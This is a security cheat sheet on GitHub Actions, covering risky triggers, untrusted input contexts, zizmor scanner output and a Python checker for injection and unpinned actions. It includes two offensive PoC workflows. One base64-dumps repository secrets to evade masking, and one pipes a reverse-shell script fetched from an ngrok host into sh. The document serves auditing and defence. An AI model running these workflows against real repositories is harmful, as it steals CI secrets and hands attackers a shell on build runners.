Github Actions

How well do you know GitHub Actions?
Leaking Secrets From GitHub Actions
Anyone can Access Deleted and Private Repository Data on GitHub
Vulnerable GitHub Actions Workflows Part 2: Actions That Open the Door to CI/CD Pipeline Attacks

Sensitive Files:

  • .github/workflows

Checklist:

  • Test any code that was obtained from a third party before a workflow runs it
  • Check whether pull_request_target is used, since it runs with access to the base repository's secrets even when the PR comes from a malicious fork
    • If it is used, check what the workflow does with it and whether it can be replaced with pull_request
  • Check whether workflow_run is used, since such workflows can be triggered by attackers
  • Check whether issue_comment is used, since it can be triggered by any comment

Permissions

Github Permission Roles

Github API Permission Endpoints:
Get allowed actions for a specific Bearer token
Get the list of repositories for a specific Bearer token
Get default workflow permissions for a specific organization

Create New Repo

Leads to a compromised GitHub

Write Privileges

Leads to a compromised GitHub

SSH Keys

GPG Keys

User Token

Example Auth using a user token

Bypass Environments Protections

If you can create a new branch or push code to a branch, you can run a GitHub Action that interacts with all branches, including the protected branch.

PoC GitHub Actions

List Secrets:

```yaml
name: list_env
on:
  workflow_dispatch: # Launch manually
  pull_request: # Run it when a PR is created to any branch
    branches:
      - "**"
  push: # Run it when a push is made to any branch
    branches:
      - "**"
jobs:
  List_env:
    runs-on: ubuntu-latest
    steps:
      - name: List Env
        # Need to base64 encode or github will change the secret value for "***"
        run: sh -c 'env | grep "secret_" | base64 -w0'
        env:
          secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
          secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORD}}
```

Reverse Shell:

```yaml
name: revshell
on:
  workflow_dispatch: # Launch manually
  pull_request: # Run it when a PR is created to the master branch
    branches:
      - master
  push: # Run it when a push is made to any branch
    branches:
      - "**"
jobs:
  create_pull_request:
    runs-on: ubuntu-latest
    steps:
      - name: Get Rev Shell
        run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh'
        env:
          secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
          secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORD}}
```

Script injections

Untrusted User Controlled Input:

  • github.event.issue.title
  • github.event.pull_request.title
  • github.event.pull_request.body
  • github.event.issue.body
  • github.event.comment.body
  • github.event.review.body
  • github.event.pages.*.page_name
  • github.event.commits.*.message
  • github.event.head_commit.message
  • github.event.head_commit.author.email
  • github.event.head_commit.author.name
  • github.event.commits.*.author.email
  • github.event.commits.*.author.name
  • github.event.pull_request.head.ref
  • github.event.pull_request.head.label
  • github.event.pull_request.head.repo.default_branch
  • github.head_ref

Scanners

zizmor

Scan actions for

zizmor

```console
>>> zizmor ./astro/.github
🌈 zizmor v1.16.3
 INFO audit: zizmor: 🌈 completed .github/workflows/benchmark.yml
 INFO audit: zizmor: 🌈 completed .github/workflows/check-merge.yml
 INFO audit: zizmor: 🌈 completed .github/workflows/check.yml
 INFO audit: zizmor: 🌈 completed .github/workflows/ci.yml
 INFO audit: zizmor: 🌈 completed .github/workflows/cleanup-cache.yml
 INFO audit: zizmor: 🌈 completed .github/workflows/congrats.yml
 INFO audit: zizmor: 🌈 completed .github/workflows/continuous_benchmark.yml
 INFO audit: zizmor: 🌈 completed .github/workflows/examples-deploy.yml
 INFO audit: zizmor: 🌈 completed .github/workflows/format.yml
 INFO audit: zizmor: 🌈 completed .github/workflows/issue-labeled.yml
 INFO audit: zizmor: 🌈 completed .github/workflows/issue-needs-repro.yml
 INFO audit: zizmor: 🌈 completed .github/workflows/issue-opened.yml
 INFO audit: zizmor: 🌈 completed .github/workflows/label.yml
 INFO audit: zizmor: 🌈 completed .github/workflows/preview-release.yml
 INFO audit: zizmor: 🌈 completed .github/workflows/release.yml
 INFO audit: zizmor: 🌈 completed .github/workflows/scripts.yml
 INFO audit: zizmor: 🌈 completed .github/workflows/sync-examples.yml
 INFO audit: zizmor: 🌈 completed .github/workflows/test-hosts.yml
 INFO audit: zizmor: 🌈 completed .github/workflows/validate-changesets.yml
info[template-injection]: code injection via template expansion
  --> .github/workflows/benchmark.yml:64:52
   |
63 |         run: |
   |         --- this run block
64 |           result=$(pnpm run --silent benchmark ${{ steps.bench-command.outputs.bench }})
   |                                                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ may expand into attacker-controllable code
   |
   = note: audit confidence → Low
   = note: this finding has an auto-fix

[...]
```

Pinning Versions

You can pin action versions to limit exposure to supply-chain attacks, but that does not mean the action you are using has also pinned its own dependencies.
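As an added example (not code from these notes and not zizmor's code), here is a small regex-based checker that turns three of the points above into automated checks: the risky triggers from the checklist (pull_request_target, workflow_run, issue_comment), the untrusted user-controlled contexts from the Script injections list when they are expanded inside a `run:` script, and `uses:` references that are pinned to a tag or branch rather than a full commit SHA. It assumes a 40-hex SHA is the only acceptable pin, reads workflow text line by line without a YAML library (so it is a heuristic, not a substitute for a real scanner), and the two embedded workflows are constructed for this example; the SHA in the hardened one is a placeholder.

```python
# Added example (not zizmor's code): a regex-based checker for GitHub Actions
# workflow files covering risky triggers, untrusted contexts expanded inside
# `run:` scripts, and `uses:` references not pinned to a commit SHA.
import re

RISKY_TRIGGERS = {
    "pull_request_target": "runs with the base repo's secrets on PRs from forks; prefer pull_request",
    "workflow_run": "can be chained from a workflow that a fork PR is able to trigger",
    "issue_comment": "fires on any comment, including ones from unprivileged users",
}
# User-controlled contexts from the list above; `*` is the object filter or an index.
UNTRUSTED_CONTEXTS = [
    "github.event.issue.title", "github.event.pull_request.title",
    "github.event.pull_request.body", "github.event.issue.body",
    "github.event.comment.body", "github.event.review.body",
    "github.event.pages.*.page_name", "github.event.commits.*.message",
    "github.event.head_commit.message", "github.event.head_commit.author.email",
    "github.event.head_commit.author.name", "github.event.commits.*.author.email",
    "github.event.commits.*.author.name", "github.event.pull_request.head.ref",
    "github.event.pull_request.head.label",
    "github.event.pull_request.head.repo.default_branch", "github.head_ref",
]
SHA_PIN = re.compile(r"^[0-9a-f]{40}$")

def _context_regex(ctx):
    """Regex for a ${{ ... }} expression that references the given context."""
    body = re.escape(ctx).replace(r"\.\*", r"(?:\.\*|\[\d+\])")
    return re.compile(r"\$\{\{[^}]*\b" + body + r"\b[^}]*\}\}")

UNTRUSTED_PATTERNS = [(c, _context_regex(c)) for c in UNTRUSTED_CONTEXTS]

def _run_script_lines(lines):
    """Yield (line_no, text) for every line that belongs to a `run:` script."""
    i = 0
    while i < len(lines):
        m = re.match(r"^(\s*(?:-\s+)?)run:\s*(.*)$", lines[i])
        if not m:
            i += 1
            continue
        key_indent, value = len(m.group(1)), m.group(2)
        if value[:1] in ("|", ">"):  # block scalar: take the indented continuation lines
            i += 1
            while i < len(lines) and (not lines[i].strip()
                                      or len(lines[i]) - len(lines[i].lstrip()) > key_indent):
                if lines[i].strip():
                    yield i + 1, lines[i]
                i += 1
        else:  # inline script on the same line
            yield i + 1, lines[i]
            i += 1

def scan_workflow(text):
    """Return (rule, line_no, detail) findings for one workflow file's text."""
    lines = text.splitlines()
    findings = []
    for n, line in enumerate(lines, 1):
        key = re.match(r"^\s*([A-Za-z_]+):", line)
        if key and key.group(1) in RISKY_TRIGGERS:
            findings.append(("risky-trigger", n, f"{key.group(1)}: {RISKY_TRIGGERS[key.group(1)]}"))
        uses = re.match(r"^\s*(?:-\s+)?uses:\s*([^\s#]+)", line)
        if uses and not uses.group(1).startswith(("./", "docker://")):
            ref = uses.group(1).rsplit("@", 1)[1] if "@" in uses.group(1) else ""
            if not SHA_PIN.match(ref):  # tags and branches can be moved; a SHA cannot
                findings.append(("unpinned-action", n, uses.group(1)))
    for n, line in _run_script_lines(lines):
        for ctx, rx in UNTRUSTED_PATTERNS:
            if rx.search(line):
                findings.append(("template-injection", n, ctx))
    return findings

# Constructed sample workflows, not taken from any real repository.
VULNERABLE_WORKFLOW = """\
on:
  issue_comment:
  pull_request_target:
jobs:
  triage:
    steps:
      - uses: actions/checkout@v4
      - run: |
          echo "Title: ${{ github.event.issue.title }}"
          echo "Branch: ${{ github.head_ref }}"
      - run: echo "${{ github.event.pull_request.body }}"
"""
# Hardened: pull_request trigger, untrusted values passed through env so the
# shell sees them as data, action pinned to a full SHA (placeholder, constructed).
HARDENED_WORKFLOW = """\
on:
  pull_request:
jobs:
  triage:
    steps:
      - uses: actions/checkout@0123456789abcdef0123456789abcdef01234567
      - env:
          TITLE: ${{ github.event.pull_request.title }}
          BRANCH: ${{ github.head_ref }}
        run: |
          echo "Title: $TITLE"
          echo "Branch: $BRANCH"
"""
```

Running `scan_workflow(VULNERABLE_WORKFLOW)` reports both risky triggers, the tag-pinned checkout and the three injected expressions with their line numbers, while `scan_workflow(HARDENED_WORKFLOW)` returns no findings: the same contexts are still used, but only as environment variables, so the shell never interprets them as code. As the pinning note says, a clean result here only covers the references in this file, not what the referenced actions pull in themselves.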